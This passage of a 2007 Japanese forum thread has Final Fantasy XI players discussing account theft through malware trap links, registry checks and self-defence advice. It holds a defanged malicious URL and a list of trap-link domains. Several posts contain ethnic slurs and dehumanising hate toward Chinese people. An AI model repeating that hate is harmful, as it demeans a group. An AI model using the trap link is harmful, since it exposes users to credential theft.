HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{AEB6717E-7E19-11d0-97EE-00C04FD91972})
のレジストリキーのみがregeditでみたらあったんだが
やばいんだろうか・・・
このレジストリ検索すると、他のMMO系のトロイでは削除される対象っぽいんだけど
消してしまっても平気なのかな・・・
852 :既にその名前は使われています:2007/10/20(土) 00:45:16.31 ID:zASU1WbZ
一応対策にはなるはず・・・
アカハック後パス抜きで倍時間がかかる。
大して変わらんけどなw
853 :既にその名前は使われています:2007/10/20(土) 00:50:07.19 ID:ZpFmf5aW
>>851
それ本当に 「HKEY_LOCAL_MACHINE」 直下だった?
HKEY_LOCAL_MACHINE\SOFTWARE\ 配下なら問題ないと思われ
854 :既にその名前は使われています:2007/10/20(土) 00:55:53.26 ID:47G8ubuq
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\
直下です
ここの直下なら問題ないというのはどういうことなんだろうか
あまり知識なくてすまそ><
あせってレジストリ消して再起動してしまったけどいいのかな
855 :既にその名前は使われています:2007/10/20(土) 00:56:28.18 ID:XYIiM42h
公式に見解でたっていうんで、期待してみにいったら
なにこのガッカリ感。
856 :既にその名前は使われています:2007/10/20(土) 00:58:25.55 ID:47G8ubuq
よくみたらSoftwareはさんでたのか・・・
あせって見間違いしてしまったみたいです
おさがわせして申し訳ない(´;ω;`)
消してしまったけど問題ないんでしょうか・・・
857 :既にその名前は使われています:2007/10/20(土) 00:58:33.49 ID:ZpFmf5aW
>>854
そっちはデフォルトで普通に存在する(正常なレジストリエントリ)から消したらダメなのよ
Virus とか Worm は、本物に似せていろいろ作るから、一字一句ちゃんと確認しないとだよ
858 :既にその名前は使われています:2007/10/20(土) 00:59:40.71 ID:ZpFmf5aW
リロードすればよかた(汗
復元するか、再度手動でレジストリエントリを生成したほうがいいよ
859 :既にその名前は使われています:2007/10/20(土) 01:01:07.38 ID:ZpFmf5aW
「レジストリエントリを生成」・・・
ごめん急いで書いたから言葉が変だわ(汗
860 :既にその名前は使われています:2007/10/20(土) 01:02:50.86 ID:XYIiM42h
関連スレたってたんだな
Wikiが業者に荒らされたら報告・修正するスレ
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1191823980/l50
[log]
861 :既にその名前は使われています:2007/10/20(土) 01:02:59.02 ID:47G8ubuq
ほんとにお恥ずかしい限り。
このスレみて不安になって、MMO系のスパイウェア色々調べてたので
気が動転してしまい、落ち着いて確認できてませんでした><
復元というのはシステムの復元でしょうか?
手動で作成する場合は、新規に文字列値で、{AEB6717E-7E19-11d0-97EE-00C04FD91972}
をコピペして張り付ければいいのかな
あまり知識もないのにいじると大変なことになりますね
反省します・・・
862 :既にその名前は使われています:2007/10/20(土) 01:14:30.66 ID:3In9yAn3
Windowsはまた未知の脆弱性みつかったらしいから、
FFマシンでブラウジングはやめたほういい
狐もAcrobatとのあわせ技でやられる可能性がある
863 :既にその名前は使われています:2007/10/20(土) 01:18:53.86 ID:LyizG2bb
ラテーヌのあのコウモリだな
864 :既にその名前は使われています:2007/10/20(土) 01:27:12.80 ID:lMaMjYRj
>>863
昨日見かけたから何のことかすぐわかったわw
865 :既にその名前は使われています:2007/10/20(土) 01:36:47.65 ID:abwlvg5h
凄いな ファイナルファンタジー11の歴史は業者vsプレイヤーの歴史
でもあるな
そしてスクウェアは限りなく業者側
866 :既にその名前は使われています:2007/10/20(土) 01:46:06.18 ID:ZpFmf5aW
>>861
ごめん>>862の情報を調べてた
ついでに、実際にそのレジストリエントリを削除すると何に影響が出るのか調べてたんだけどわからなかった(どなたかフォローよろしく)
復元はシステムの復元をさしたんだけど、1個削除しただけなら手動で追加するだけで問題ないと思われ
(追加は、エディタウィンドウ右で [右クリック] → [新規] → [文字列値] で {AEB6717E-7E19-11d0-97EE-00C04FD91972}
を追加すればOKです)
もしくは ↓を テキストエディタにコピペして "(任意の名前).reg" で保存して、ダブルクリックすると追加されるよ
---↓↓↓をコピペ↓↓↓ ---
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{AEB6717E-7E19-11d0-97EE-00C04FD91972}"=""
--- ↑↑↑ ここまで↑↑↑ ---
>>862
KB943521のことかな?
(ttp://www.microsoft.com/japan/technet/security/advisory/943521.mspx)
867 :既にその名前は使われています:2007/10/20(土) 02:11:42.02 ID:sTDgfxZh
今度はIE7とAcrobat方面の穴ですか。業者の罠サイト誘導が一段落しているのが
不気味です。
いわゆるプロの人向けなので話題が難しめだけど、Windowsのセキュリティ関係は
ttp://bbs.hotfix.jp/ という掲示板が詳しいです。Windows板と合わせて読むといいかも。
最近の罠サイト誘導カキコは.3つのドメインからのものがほとんどのようです。
163data.com.cn(中国)、福岡と東京のODNドメイン、ap.yournet.ne.jp(フリービット)。
163dataは以前cndata.comを使っていた悪名高いドメインのようです。blogやWikiを
主宰している人はできるなら遮断しておきましょう。
ODNドメインは、まああんな感じ。ODN以外のプロバイダなのに、ソフトバンクに買収
されてODNのリーもとホスト名になっているところもあります。
yournet.ne.jpは200社を超える中小プロバイダの元締め。リモートホスト名からは
ユーザーが直接契約しているプロバイダや地域がわからないので困りもの。
そのために2chのプロバイダ規制がかかるときは200社以上全国一括で規制されます。
868 :既にその名前は使われています:2007/10/20(土) 02:12:47.24 ID:VCBgFFrf
PC厨涙目www
バロスwwwww
869 :既にその名前は使われています:2007/10/20(土) 02:15:21.94 ID:xcDWhQzY
誰か中国の海底ケーブル切断してくれ
870 :既にその名前は使われています:2007/10/20(土) 02:24:14.80 ID:ZpFmf5aW
>>867
情報サンクス。最近はいろいろ複雑だからねぇ(汗
Firefox がインストールしてあると、IE にセキュリティホールができるてのもあったしw
Firefox をインストールしてるってことは、IE を機会はそうそうないんだろうけど
Opera だって重大なセキュリティホールがなかったわけじゃないし Firefox もしかり
実は Opera は対応がかなり遅いし、最近 Microsoft は、セキュリティの第一人者的存在になってるしw
まぁ何使うにしても、常に最新版か patch は当てないとあぶないやね
871 :既にその名前は使われています:2007/10/20(土) 02:31:28.38 ID:UkI+fvqs
Operaの一番の問題は、シェアが1%未満な事だな
だからwebサイトの管理者に切り捨てられ易い
872 :既にその名前は使われています:2007/10/20(土) 02:36:30.30 ID:yv9Sd6DQ
>870
自分で穴あけて穴埋めてる観があるけどな>MS
873 :既にその名前は使われています:2007/10/20(土) 02:38:42.44 ID:rYG0wsf+
>>870
あとFirefoxは起動時にアップデートの有無をチェックして
アップデートが有ればアップデートしてくれる。
まあIEもやってくれるけどあっちはOSと一緒に時間を
決めてなんでFFの邪魔になるw
俺も昔はoperaを使っていたけどパッチが出るのが遅いんで
止めたんだよなー。operaのバグを狙ったウィルスなんぞ
滅多にないけど
874 :既にその名前は使われています:2007/10/20(土) 02:50:48.77 ID:ZpFmf5aW
[NN]
↓ホームページみれねぇえええ
[IE]
↓セキュリティホール怖ぇえええ
[NN]
↓機能付けすぎ重過ぎー!どんだけぇ〜!
[Opera]
↓広告うざすぎ。バグ多すぎ
[FF]
↓移行まんどい、バージョンアップで Plug-in 死亡
[IE] www
いろいろ試して結局 IE な俺www
m$ 信者とでも呼んでくれww
875 :既にその名前は使われています:2007/10/20(土) 03:17:40.19 ID:wQRIMBqP
専ブラで罠URL踏んでしまったんだが・・・これってやばい?
寝ぼけてやってもうた
876 :既にその名前は使われています:2007/10/20(土) 03:20:06.36 ID:/r3ZrX/4
inしてパス変えれ
877 :既にその名前は使われています:2007/10/20(土) 03:21:00.03 ID:wQRIMBqP
レスあり了解
878 :既にその名前は使われています:2007/10/20(土) 03:26:52.53 ID:M5MHAzCe
自分の身は自分にしか守れない。
ブラウザを変えたからこれで安心、では決してないわけで。
このスレを見て危機感を持ちなんらかの行動を起こした人は
おそらく問題はないと思うが、
こういうのの被害は、「知らなかった」「自分は大丈夫だと思った」が大半だしなー。
スクエニがもっと啓蒙してくれりゃ出してくれりゃいいのに。
こういう事が起こってる、うちでも気をつけるがそっちでも注意しろ、
あともし取られたらすぐうちに連絡しろ、つって。
無理だろうけどな。面倒はご免だっつってたらい回しにするくらいだし。
879 :既にその名前は使われています:2007/10/20(土) 03:33:39.90 ID:L8WRxlMe
>>877
他PC(ネカフェとか不特定多数の使う奴じゃなく)
またはPS2でね
880 :既にその名前は使われています:2007/10/20(土) 03:34:00.20 ID:XFJQobWw
友だちの名前なんで、「?」と思いつつもクリックしたら、画面が真っ白。
ウィルスバスターは最新だが反応しなかった。
いまスキャン中……だが、出てくるかどうか。
出てこなかったらどうすれば?
さいわいゲームはPS2でやってるから、POLは大丈夫なはず。
mixiとか、そのほかの個人情報の方が痛い……
寝れない……
881 :既にその名前は使われています:2007/10/20(土) 03:38:43.68 ID:L8WRxlMe
郵便とかで本人の住所確認ができて
垢売買等でないと証明できればキャラデータ1週間巻き戻りくらいはしてくれていいとおもうんだけどなー
というかそのくらいのことができなければ膨大な数の被害顧客たちをごっそり失うことになるだろうに
882 :既にその名前は使われています:2007/10/20(土) 03:39:53.33 ID:iZgDaBOI
>>880
とりあえずその辺のパスひたすら変えておけば?
883 :既にその名前は使われています:2007/10/20(土) 03:41:35.22 ID:h5GJcb5k
くそmixiの日記に突如無関係なレスが付いてたので
ソースチェックしたらリンク先のサイトがある場所チョンツーじゃねえか!
業者死ねよ!
884 :既にその名前は使われています:2007/10/20(土) 03:42:05.69 ID:L8WRxlMe
>>880
クレジットカードのデータ盗む奴もあるらしいから
ネットでカード使ったことがあったらカード会社に電話してとりあえず止めてもらうとか
885 :既にその名前は使われています:2007/10/20(土) 03:45:14.47 ID:2ivCEz2p
>>881
ありえねーだろ
労力かかりすぎ、キャラデータ巻き戻しとか本人以外への影響はどうすんの?
指定された住所が本当の持ち主だってどうやって証明するの?
住所のデータ管理だってタダじゃねぇぞ
886 :既にその名前は使われています:2007/10/20(土) 03:49:54.43 ID:hATNkFCn
IEってOSの一部でその機能はOSにも使われているから
他のブラウザーと違ってセキュリティーホールも出やすい
んだよなー(他のブラウザー以上に色々考えないと行け
ないから)
まあ、OSでも使われているので他のブラウザーを使って
いるから安心とも言えない訳だが。IEはアンインストール
不可能だからね。
887 :880:2007/10/20(土) 03:53:41.62 ID:XFJQobWw
>882
ありがとう。とりあえず今打ち直すとアレだからスキャンが終わったらやってみる。
>884
ありがとう。ひとまず、朝になったら連絡してみます。
888 :既にその名前は使われています:2007/10/20(土) 03:54:45.14 ID:Fro8stwQ
POLとFFの会員登録通知のハガキがたくさん来てた人はどうなったんだろ?
889 :既にその名前は使われています:2007/10/20(土) 04:00:01.39 ID:hAIal50M
>>875
俺も先週の土曜専ブラで踏んで
オンラインスキャン>なんかあったので駆除>ウィンドウズアップデート>再起動>もう一度チェック>POLからパス変更ってやった
一応今日までなにもないが不安だ
まじ業者死ね
890 :既にその名前は使われています:2007/10/20(土) 04:08:41.55 ID:LyizG2bb
なんで生きてても何の役にも立たない支那の家畜共の為に
その家畜共を使い捨てる、カーストの上位にいる人間様が
こうやって手を煩わせなきゃいけないんだろうな。
あいつらの延命なんて全く意味がないんだから
人に迷惑かけなきゃ生きていけなくなった時点で死ぬべきだろうに。
891 :既にその名前は使われています:2007/10/20(土) 04:09:10.52 ID:x+3E/Zdx
おこんばんわ>>559だ。
携帯からなのであまり長く書けないが続報をば。
今日(もう昨日だが)サポセンから調査結果の報告があった。
「疑わしいアクセスはあったが断定はできない、警察に届けてくれ」とのこと。
課金も鯖移動も現時点ではそのままで、警察の捜査次第です、だそうだ。
そして紛失したアイテムについてはサポセンではなくゲーム内の管轄なので
GMを呼んで相談してね、で電話終了。
各所に丸投げしただけという感が否めないが一応進展はした。
週明けに資料揃えて警察に行ってくるわ。
ちなみに自分もluckshopにアイテム売り払われたクチだ
892 :既にその名前は使われています:2007/10/20(土) 04:40:13.60 ID:h5GJcb5k
mixiで以下のURLあっても踏まないようにご注意。
www●yyjjoopp●com/froum/view●jpg
893 :既にその名前は使われています:2007/10/20(土) 04:41:57.17 ID:whEW+zZx
WindowUpdateを行う
セキュリティソフトの定義ファイルをこまめにアップデートして最新状態に保つ
一度cookie等を掃除してセキュリティソフトでシステムにスキャンをかける
罠サイトを踏んでいなくともPOLパスワードを変更する
もちろん123456…等の分かりやすすぎるのはアウト
念を入れて大文字、小文字、数字を混ぜて8文字以上で
不正プログラムやスパイウェアの侵入の心配がまずないPS2などがあるなら
念のためPS2でログインしてパスワードを変更する
894 :既にその名前は使われています:2007/10/20(土) 05:18:55.84 ID:yv9Sd6DQ
こういうのって、犯人側は大規模犯行なんだが、被害者側は、
社会的には、娯楽の被害、少額の被害ってことで軽く見られる。
このアンバランスが犯人側にとってはめちゃくちゃ美味しいんだよな。
悔しくて顔真っ赤になるよ、これは
895 :既にその名前は使われています:2007/10/20(土) 06:21:36.33 ID:Kv/pdDvf
一昨日までセキュリティにはとても疎かった
ここ見て、皆すごい詳しいんで勉強になった
参考にしてやってみた事
IEコンポーネントのLive2chをV2Cに、アプリ版gooRSSを削除
元からopera使いだけどoperaでも、cookieとjavaスクリプトは通常offで使うようにした
(operaはサイトごとにそーいうのを設定出来る機能があった事を発見、これはいい)
IEはupdateとGyaO専用になった
アンチスパイウェアのspybotっていうのをDLしてみた
(ウィルスにはDefenderとウィルスバスター)
他にも注意点あったらヨロシクです
あと、ここで知ったアグネスネットを大活用
今まで安易にリンク踏みまくってたけど踏まないようになった
896 :既にその名前は使われています:2007/10/20(土) 07:07:38.15 ID:d6o8Ovxd
>>892
迷子スキル青字ですコミュにて、URL発見しました。
「台湾人は赤ちゃんを食べる」みたいなトピックが立てられて、
そこに貼られてました。
897 :既にその名前は使われています:2007/10/20(土) 07:13:36.24 ID:H8VTRJwI
>>880
回線抜いとけば情報もれることはない
898 :既にその名前は使われています:2007/10/20(土) 07:53:47.97 ID:lrf7UYOU
FireFox使う人は下記のアドオンおすすめ
2chブラウザ化
- bbs2chreader 0.4.6: http://wannabe.fam.cx/service/link.cgi?http://bbs2ch.sourceforge.jp/
軽量マウスジェスチャー
- FireGestures 0.1.20071005: http://wannabe.fam.cx/service/link.cgi?http://www.xuldev.org/firegestures/
多機能サイドバー
- Sidebar Mix 0.2.1: http://wannabe.fam.cx/service/link.cgi?http://tinybenki.sblo.jp/
多機能タブ強化
- Tab Mix Plus 0.3.5.2.070127: http://wannabe.fam.cx/service/link.cgi?http://tmp.garyr.net
タブをグループ化
- tabgroups 0.02: http://wannabe.fam.cx/service/link.cgi?http://paranoid-androids.com/tabgroups/
マウスホイールなどスムーズ化
- Yet Another Smooth Scrolling 1.0: http://wannabe.fam.cx/service/link.cgi?http://www.aa.alpha-net.ne.jp/kataho/xpi/yass.html
899 :既にその名前は使われています:2007/10/20(土) 07:56:24.05 ID:5D5z29ae
FFAHでLuckshopというキャラを調べてみてくれ。
このキャラ、
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192376172/
[log]
のスレによると、各鯖に同名キャラが居て、
パス抜き→垢ハックして、奪ったアイテムを売却するキャラらしい。
履歴は売りのみ、買いは無し。
うちの鯖でも高額品ばかり取引してるって事は
誰か垢とられたやつがいるってことだよな。
900 :既にその名前は使われています:2007/10/20(土) 07:57:05.19 ID:5D5z29ae
↑誤爆しましたー。申し訳ない。
901 :既にその名前は使われています:2007/10/20(土) 08:26:14.82 ID:Uar8V4dP
この前クリーンインストールした俺のPCがブラウザだらけな件について
902 :既にその名前は使われています:2007/10/20(土) 08:55:08.93 ID:d6o8Ovxd
最近mixiで、見知らぬ人の足跡がよくつくので、その人のページにとんだら
プロフも日記も書いてなくて、しばらくしたらその人のページ消えてるんだよね。
その人の名前がアルファベット4文字とかでさ。
今回の件と関係ないかもしれんが、怪しいのがいるのう
903 :既にその名前は使われています:2007/10/20(土) 09:36:25.22 ID:lrf7UYOU
あー>>898のURLのh抜くの忘れてた、スマソ。アドオンのHPだから安全だけど流れ的に抜くべきだったなあ
>>901
IE以外のブラウザはFireFoxが個人的にはオススメなんだがどうだろ?
ソフトウェア板にFireFoxアドオンスレあるから便利そうなの探して入れてみるといいよー
自分がFireFoxにした決めてはニコニコ動画のお気に入りを無限に拡張するアドオンがテラ便利w
904 :既にその名前は使われています:2007/10/20(土) 09:41:23.76 ID:m6fWH2hc
自分の所の鯖スレに、罠リンクの事と、今すぐできる対策を書き込んだんだが
見事なまでに無反応で、相変わらずの私怨晒しの応酬で肩透かし食らったよ
全員PS2ユーザーなのか、既に対策を講じてるのか、自分だけは引っかからないと思ってるのか…
905 :既にその名前は使われています:2007/10/20(土) 09:44:49.06 ID:J2qkYX7b
いろんな人のブログに貼ってたなぁ。
FFとネットを同じPCでやってる人を釣りたいなら、もう少し勉強した方がいいのぅ。
安田ネタで釣られる人いるんだろうか…。ブログ見ました〜ってのは釣れると思う。
ちるまんとかブロントのネタなら案外釣れるかもしれん…。
とまぁ冗談はさておき、踏んでアイテム売られた方は御愁傷様。
ただ、Luckshopから安く購入した人達はどうなるんだろう。
906 :既にその名前は使われています:2007/10/20(土) 09:46:15.93 ID:IzNPQ+m/
これ規約だのなんだの関係なく、リアル犯罪じゃん
警察なにやってんだよ
907 :既にその名前は使われています:2007/10/20(土) 09:48:29.95 ID:0cgmtWU0
>>802でmixiの日記に書かれた報告した者だけど
また書き込みがあったので追加報告
ttp://www●yyjjoopp●com/froum/view●jpg
本文の出だしは
去年、マレーシアのメディアが「台湾人は赤ん坊を食べる」〜
既出だった気がするけど気にしない
しかしマイミクにFF仲間が多いから啓蒙の為に日記書いたらそのレスに罠貼るとか、どうなのよ・・・しかも2回もw
対策とか予防とかは、ここを引用させてもらった感謝
908 :既にその名前は使われています:2007/10/20(土) 09:49:28.69 ID:A5nAlJj1
>台湾人は赤ん坊を食べる
それ中国j
909 :既にその名前は使われています:2007/10/20(土) 09:50:03.82 ID:UkI+fvqs
>>903
h抜く必要性が皆無だから別にいいじゃん
910 :既にその名前は使われています:2007/10/20(土) 09:51:58.52 ID:GXD0rGbv
罠踏んで実際に被害を受けた人に聞きたいんだけど、
WindowsUpdateはほとんどしていなかったのかな?
最新のWindowsUpdateを当ててあってもパス抜かれて被害に遭った方います?
911 :既にその名前は使われています:2007/10/20(土) 09:54:08.31 ID:0ZH3wAwd
>>904
ウチの鯖も似たようなもんだったな(>_<)
逆に晒し系の隔離板は速攻で対応してたのがなんだかなー
912 :既にその名前は使われています:2007/10/20(土) 09:57:24.05 ID:LyizG2bb
台湾人にレッテルを貼った上に罠URLって
支那畜の劣等感はたいしたもんですね^^;
劣等感感じた時点で死ねよChink^^;
913 :既にその名前は使われています:2007/10/20(土) 09:58:01.66 ID:dBpbgqG7
>>904
お前さんはよくやった
警告があるのに対策しない奴は
一度痛い目見ればいいんだよ
914 :既にその名前は使われています:2007/10/20(土) 10:01:07.11 ID:fgLPiLMi
もし踏んで不安なら、クリーンインストールしなされ
時間かかるが、これが一番オススメ
FFに限った話だと、そのPCはゲーム専用PCにするのがいいけど、中々難しいな
915 :既にその名前は使われています:2007/10/20(土) 10:03:27.64 ID:pXu+ENYA
台湾人がどうのこうの
昨日鞄のミクシーのやつかな
携帯から見ただけでよかった〜
トピックたてるのに規制とかできないのかな?
916 :既にその名前は使われています:2007/10/20(土) 10:03:39.33 ID:wyZhklJM
PC分からない人なら解決になってないが、PCのFF消して箱やPS2でやるのも対策の一つなのかねぇ。
もともとPS2ユーザーの人限定になってしまうが。
917 :既にその名前は使われています:2007/10/20(土) 10:06:43.61 ID:W3PFPo8z
ログインしっぱなしなら被害にあったか判別できるんじゃね?
別の所からログインがあったら落とされる
現場に居合わせたらこっちもログイン合戦で対抗・・・
918 :既にその名前は使われています:2007/10/20(土) 10:08:17.90 ID:IzNPQ+m/
>>917
いやいや、パス変更しろよw
919 :既にその名前は使われています:2007/10/20(土) 10:11:34.14 ID:PGVC9cvS
しかし一度PC版に慣れるとPS2版にはなかなか戻れない
やはり画質が違いすぐる
マクロをファイルとしてバックアップとっておけるのも強みだし
PS2はウィルス感染の可能性がないからパス変更時にはPS2でログインするといい
万が一ウィルスに感染してるPC版でパス変更したって無意味だしな
920 :既にその名前は使われています:2007/10/20(土) 10:11:47.10 ID:W3PFPo8z
俺はPS2使い
PC使いはPS2でパス変えてログインしっぱなしでw
921 :既にその名前は使われています:2007/10/20(土) 10:17:15.43 ID:0ZH3wAwd
>>888
かなり前にここでブログ主が自分でブログの宣伝してたやつだね
個人情報が盗まれたってタイトルだったか
しばらく前にみたら10月の法廷でブログ主の訴えの棄却が決定していたよ
それでもあきらめつかないのか脳内理論全開でブログは続けるみたいw
コメント欄でのブログ主の自演も痛くて見てて(;^_^Aになったw
922 :既にその名前は使われています:2007/10/20(土) 10:19:29.38 ID:wyZhklJM
>>921
懐かしいなそれ。
次はnyで顧客情報でも流れそうで怖いのだが・・・・。
923 :既にその名前は使われています:2007/10/20(土) 10:19:52.51 ID:m6fWH2hc
危機感のある奴はとっくに対策を施してるし、
そうじゃない奴は、URLを踏んでも気付かず最終的にアイテムと
ギルを巻き上げられるまで自分の身に起こった事がわからないって事かねぇ
実際に、Luckshopによる被害が出ているのに、俺のいる鯖では皆無関心だったから驚いたよ
>>917
向こうは人海戦術でくるから、ログイン合戦はこっちがジリ貧になって終わる
踏んでしまった覚えがあるなら、PCをクリーンインストールし、パスを変えたほうが良い
もし、コンシューマー機でもFFが出来るなら、先にそちらでパスを変えたほうが良いだろう
仕掛けてくる側は命と生活が掛かっているし、罪悪感などないから
どんなことだってやるぞ
924 :既にその名前は使われています:2007/10/20(土) 10:21:17.71 ID:W3PFPo8z
PCでもFFXIやってみたいけどプロバイダとかIDの関係が今一よくわからない
詳しく解説している所ってある?変なプロバイダに加入させられたのが未だに気にかかっている
別の場所&PCでプレイ出来るものなのだろうか
925 :既にその名前は使われています:2007/10/20(土) 10:25:46.55 ID:yQ8oFw2t
パス云々なら、ずっとインしてればいいジャマイカ
926 :既にその名前は使われています:2007/10/20(土) 10:30:46.14 ID:ZDXCHA7p
>>894
犯人にとっては、手に入るものは現金泥棒と変わらないからね
にもかかわらず、被害が軽く見られたり刑事事件として立件されなかったり、
犯人側にとってはおいし過ぎる
927 :既にその名前は使われています:2007/10/20(土) 10:31:46.86 ID:A5nAlJj1
しかも■は隠したがってるときた
928 :既にその名前は使われています:2007/10/20(土) 10:33:10.80 ID:W3PFPo8z
垢の財産とられるより、犯罪者に個人情報がわたる事の方が恐ろしい
929 :既にその名前は使われています:2007/10/20(土) 10:37:14.08 ID:dBpbgqG7
財布を路上に放置して金取られたって言ってるようなもんだろ・・・
■がアホな対応しか出来ないなら、ユーザーで意識たかめるしかねー。
930 :既にその名前は使われています:2007/10/20(土) 10:39:17.19 ID:GVQjGBb3
せっかちの人も被害者になってるw
931 :既にその名前は使われています:2007/10/20(土) 10:40:39.80 ID:nqyIWk3v
ログインすれば個人情報簡単に見れる仕様だしなぁ。
翌日から俺が居なくなってて知らないヤツが俺になりかわってたらどうしよう。
932 :既にその名前は使われています:2007/10/20(土) 10:42:26.25 ID:MDpgyvHq
>>920
だからログインしっ放しは無意味
普通に使え、24時間PS2起動しっぱなしだとHDD消耗する
PCで垢ハック→本人ログイン→中華同一垢でログイン
本人垢落され。つまり同一垢なら後からログインする方が優先される
933 :既にその名前は使われています:2007/10/20(土) 10:43:52.81 ID:IzNPQ+m/
FF系のブログは勤務時間中に会社のPCで見ろでFA
934 :既にその名前は使われています:2007/10/20(土) 10:50:52.04 ID:dBpbgqG7
・ちょっと頭の回る奴がパス抜き以外にも色々bot仕込む
・会社のPCで中国のサイトにアクセス
・会社の重要なデータがクラックされる
・自分が会社から訴訟される
・あぼーん
まったくありえない話じゃない、やめとけw
まあマトモな会社なら勤務中に余計なところを見れば
それだけで査定の対象になると思うが。
935 :既にその名前は使われています:2007/10/20(土) 11:02:10.44 ID:VBRDOltT
そういやさ更新課金の画面一番最後にユーザー情報全開にしてくれるんだよな
個人情報ダダ漏れな訳で…
936 :既にその名前は使われています:2007/10/20(土) 11:03:47.88 ID:gmgjDhq4
中国には食人の風習が過去歴史書にも肯定的に登場してくるというお国柄
秦の時代から近代チベットの大虐殺まで国家的大量虐殺(ホロコースト)
には2千年の歴史がある
そしてこれら自分に向けられた非難を全て敵国かぶせるのが彼らの得意技
937 :既にその名前は使われています:2007/10/20(土) 11:30:59.05 ID:L+G4vg/h
この問題を大阪でのイベントで是非とも質問として挙げて欲しい。
一人二人でなく大勢でテンプレに沿った内容を書くか、
ユーザーの集まりとして誰か代表して書いて貰うか。
そこで■eが黙殺するか、軽くスルーするか、まじめに応えるかで
今後の■eの対応が想像付くと思う。
938 :既にその名前は使われています:2007/10/20(土) 11:31:18.76 ID:Uar8V4dP
とりあえず自分のブログにURL張られたらケータイかwiiで践んでみる習慣がついた
939 :既にその名前は使われています:2007/10/20(土) 11:32:17.16 ID:XYIiM42h
中国なんかなくなればいいのに。
940 :既にその名前は使われています:2007/10/20(土) 11:41:21.51 ID:gmgjDhq4
日本はチベットと同じ中国の周辺国家なんだぜ
チベット人は侵略され虐殺され女は犯され思想改造されでもう涙目どころじゃない
あの国に対して黙ってたらどこまでもヤラれちまう
でもスーパーでウナギ買わないようにするくらいしか出来ない俺情け茄子
941 :既にその名前は使われています:2007/10/20(土) 11:46:42.69 ID:W3PFPo8z
中国産の米を買わなければOK
中国産のコシヒカリって違和感有りすぎだろ
942 :既にその名前は使われています:2007/10/20(土) 11:52:19.81 ID:Uar8V4dP
いわゆるシナヒカリか
943 :既にその名前は使われています:2007/10/20(土) 11:54:14.61 ID:0ZH3wAwd
安いMACを購入して、メールやネットはそれでやれば安上がりで安全確実だよね
944 :既にその名前は使われています:2007/10/20(土) 12:00:26.16 ID:lMaMjYRj
こんにちはMacですのCM思い出した
945 :既にその名前は使われています:2007/10/20(土) 12:04:53.32 ID:IIkNIQtk
>>796
こいつやべぇな
ここ2〜3日に競売だけで2000万売り上げてるぞ
そんだけパス盗まれてる奴がいるってことか
946 :既にその名前は使われています:2007/10/20(土) 12:06:39.37 ID:A5nAlJj1
このスレ1000なったら■に送るか
947 :既にその名前は使われています:2007/10/20(土) 12:11:00.65 ID:VBRDOltT
Luckshopについては、各鯖から複数の通報がいってるようなので
おそらくはSTTの監視対象になっている可能性はあるが…
どこまで対処する気なのかなあ
不正アクセスと窃盗だから立派な犯罪である以上、対処しないのはマズイはず…
なんだけど■だしねえ
948 :既にその名前は使われています:2007/10/20(土) 12:11:31.23 ID:aeyQlLeX
ごめん ちょい質問なんだけど
なんでeuphidimeが危険リストに載ってるの?
949 :既にその名前は使われています:2007/10/20(土) 12:14:57.67 ID:MKNO1ls7
この件に関してのまとめサイトってある?
wikiだと業者の改竄が怖いから、ないなら作りたいんだけど。
950 :既にその名前は使われています:2007/10/20(土) 12:24:45.55 ID:F8sy1S2B
これは犯罪なんだよね ■eは腰が重すぎるんじゃないの?
そんなんじゃ一部の社員が裏で繋がってるとか勘ぐられてもしかたがないよ
あとこういう問題はたまに書かれてるけど
「廃人ざまぁ」とか「PC厨ざまぁ」とかって次元の問題じゃない
2年前に引退済みのネ実民の俺だが結構大変な事だと思うよ
FFは入ってないが自分も気を付けることにする
それぞれがしっかり自衛する事が全体の利益になると思うよ
951 :既にその名前は使われています:2007/10/20(土) 12:24:46.74 ID:Kv/pdDvf
ぜひ作ってほしい
952 :既にその名前は使われています:2007/10/20(土) 12:26:29.67 ID:yv9Sd6DQ
しかし、今の法律(運用?)はどうみても実態に沿ってないな。
損失のほとんどはパス抜かれたプレーヤーが担わされている。
それなのに、アクセスされた鯖の持ち主じゃないから不正アクセスの
被害者じゃないでしょw って言われるんだろ。
なんか小学生の屁理屈みたいじゃん。
953 :既にその名前は使われています:2007/10/20(土) 12:26:55.25 ID:rxkHDHoO
まとめサイト自体はまだないけど、
作るなら雛形にでもしてくれいってのが>>542にあるお
>>948
その件でスレが立ったときに、スレ内で罠サイトだから踏むなって騒いだやつが何人かいて、
その流れで完全に安全なサイトとも言い切れないとかなんとかって流れなのかなぁ?
とりあえずしな業者とは無関係、のはず。
954 :既にその名前は使われています:2007/10/20(土) 12:27:27.79 ID:rxkHDHoO
すまん>>452だった
955 :既にその名前は使われています:2007/10/20(土) 12:27:58.23 ID:t4mgEPrL
■eは赤福や相撲協会や校長と同じで公にしたくないんだよ
956 :既にその名前は使われています:2007/10/20(土) 12:30:05.27 ID:m6fWH2hc
なんというか、■eに抗議しようとか、これ犯罪だよ!とか言う議論のレベルを追い越してて、
今すぐに自分自身で自衛策を取らないとならない状況に陥ってるよな
まとめサイト等作れるなら是非作って欲しい
出来る限りの情報提供はするが、Luckshopというキャラ自体、
今月で消えてしまいそうな危険性がある
何をやっても中華業者のやる事に追いつけない危機感があるよな…
上のレスでも何人もの人が言ってるが、怪しいURLを踏んでしまったら
常時ログインで防衛戦を貼ることは不可能なので
速やかにPCをクリーンインストールするしかない
ここで■eが悪い、中国の体質が悪いと言う前に防衛策を急ごう
957 :既にその名前は使われています:2007/10/20(土) 12:30:54.50 ID:VBRDOltT
【社会】「テイルズウイーバー」に他人のIDで不正アクセス…方法は「2ちゃんねるで見た」 - 大阪の高校生逮捕
http://wannabe.fam.cx/service/link.cgi?http://news22.2ch.net/test/read.cgi/newsplus/1192699349/l50
[log]
これの通報から警察が動いた経緯とかわからんかな
958 :既にその名前は使われています:2007/10/20(土) 12:32:06.44 ID:IzNPQ+m/
WIKIとかにまで罠しこまれてたら、さすがにやばいな
ブログとかみねーけど、WIKIはかなり頻繁に見てるし・・・
959 :既にその名前は使われています:2007/10/20(土) 12:33:16.72 ID:vgKEL/kY
